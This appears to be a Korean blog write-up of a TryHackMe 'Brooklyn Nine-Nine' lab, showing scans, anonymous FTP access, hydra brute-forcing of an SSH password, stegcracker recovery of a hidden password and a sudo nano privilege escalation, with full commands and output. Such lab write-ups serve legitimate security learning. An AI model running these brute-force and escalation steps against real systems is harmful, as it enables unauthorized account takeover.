🕵🏼 스테가노그래피 🕵🏼

스테가노그래피는 다른 파일 안에 파일이나 메세지를 숨기는 것이다. 주어진 자료는 대상 ip뿐이다.

 

1. 조사

먼저 Nmap 스캔을 해보았다. 기본 Nmap 스크립트(-sC)와 버전감지(-sV)를 사용하였다.

┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.107.210            
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-30 06:39 EST
Nmap scan report for 10.10.107.210
Host is up (0.29s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.13 seconds

21(ftp), 22(ssh), 80(http)의 세가지 포트가 열려있고 ftp 서버에서 note_to_jake.txt 파일을 발견할 수 있다.

 

다음으로 GoBuster를 사용하여 숨겨진 디렉토리와 파일을 찾아보았다.

┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.107.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.107.210
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2021/12/30 07:04:41 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 718]

/index.html

 

그 다음으로 Nikto 웹스캔을 해보았다.

┌──(root💀kali)-[~]
└─# nikto -host 10.10.107.210
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.107.210
+ Target Hostname:    10.10.107.210
+ Target Port:        80
+ Start Time:         2021-12-30 07:05:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2ce, size: 5a5ee14bb8d76, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST

별게없음..

 

다음으로 웹사이트를 확인해보았다.

소스 코드상에서 주석 처리한 곳에 스테가노그래피에 대한 힌트(<!-- Have you ever heard of steganography? -->)가 보인다.

index.html 페이지의 이미지를 다운받아 두자.

 

이전 조사에서 익명의 ftp 액세스가 활성화되어있음을 알고있다. ftp에 접속해서 노트가 담긴 텍스트파일을 얻어보자.

login name: anonymous / pw: 비워둠

└─# ftp 10.10.107.210                                                                                                                                    1 ⨯

Connected to 10.10.107.210.
220 (vsFTPd 3.0.3)
Name (10.10.107.210:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.00 secs (103.2069 kB/s)
ftp> exit
221 Goodbye.

메모로부터 Jake의 암호가 취약하고 Holt라는 사람이 있다는 걸 알 수 있다. 이 사람은 아마도 Jake의 관리자이며 서버에 액세스할 수 있을 것이다.

└─# cat note_to_jake.txt       
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

 

2. 비밀번호 BruteForce

Jake의 암호가 취약함을 알고 있기 때문에 SSH 로그인을 위해 hydra로 비밀번호를 무차별 대입해보았다.

┌──(root💀kali)-[~]
└─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.107.210 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-30 07:31:43
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.107.210:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[22][ssh] host: 10.10.107.210   login: jake   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-30 07:34:14

login: jake   password: 987654321 를 얻을 수 있었다.

 

로그인 해보자.

┌──(root💀kali)-[~]
└─# ssh jake@10.10.107.210                  
The authenticity of host '10.10.107.210 (10.10.107.210)' can't be established.
ED25519 key fingerprint is SHA256:ceqkN71gGrXeq+J5/dquPWgcPWwTmP2mBdFS2ODPZZU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.107.210' (ED25519) to the list of known hosts.
jake@10.10.107.210's password: 
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ cd ..
jake@brookly_nine_nine:/home$ ls
amy  holt  jake
jake@brookly_nine_nine:/home$ ls holt
nano.save  user.txt
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

user.txt에서 첫번째 플래그를 확인할 수 있다.

 

 

3. 스테가노그래피

exirtool을 사용하여 아까 이미지를 조사해보자

없으면 설치ㄱㄱ

apt install libimage-exiftool-perl

 

┌──(root💀kali)-[~/Downloads/tryhackme]
└─# exiftool brooklyn99.jpg
ExifTool Version Number         : 12.38
File Name                       : brooklyn99.jpg
Directory                       : .
File Size                       : 68 KiB
File Modification Date/Time     : 2021:12:30 07:45:32-05:00
File Access Date/Time           : 2021:12:30 07:45:32-05:00
File Inode Change Date/Time     : 2021:12:30 07:45:32-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 533
Image Height                    : 300
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 533x300
Megapixels                      : 0.160

flie type이 jpeg인것을 알 수 있다.

 

이미지의 숨겨진 데이터를 추출하는 툴 중 하나는 Steghide이다.

없으면 설치ㄱ

apt install steghide

비밀번호가 있어서 접근하지 못한다. 비밀번호를 알아야 한다.

┌──(root💀kali)-[~/Downloads/tryhackme]
└─# steghide extract -sf brooklyn99.jpg
Enter passphrase: 
steghide: can not uncompress data. compressed data is corrupted.

Stegcracker를 사용하여 rockyou.txt로 무차별대입을 해보자.

┌──(root💀kali)-[~/Downloads/tryhackme]
└─# stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which 
will blast through the rockyou.txt wordlist within 1.9 second as opposed 
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20395 passwords
Your file has been written to: brooklyn99.jpg.out
admin

결과는 brooklyn99.jpg.out파일에 저장된다.

┌──(root💀kali)-[~/Downloads/tryhackme]
└─# cat brooklyn99.jpg.out     
Holts Password:
fluffydog12@ninenine

Enjoy!!

얻은 비밀번호로 holt계정에 로그인한다.

┌──(root💀kali)-[~/Downloads/tryhackme]
└─# ssh holt@10.10.107.210                                                                                                                             130 ⨯
holt@10.10.107.210's password: 
Last login: Tue May 26 08:59:00 2020 from 10.10.10.18
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano

플래그를 보려면 nano 편집기로 root.txt파일을 열어야한다. 

holt@brookly_nine_nine:~$ sudo nano /root/root.txt

 

Ref

• 스테가노그래피 툴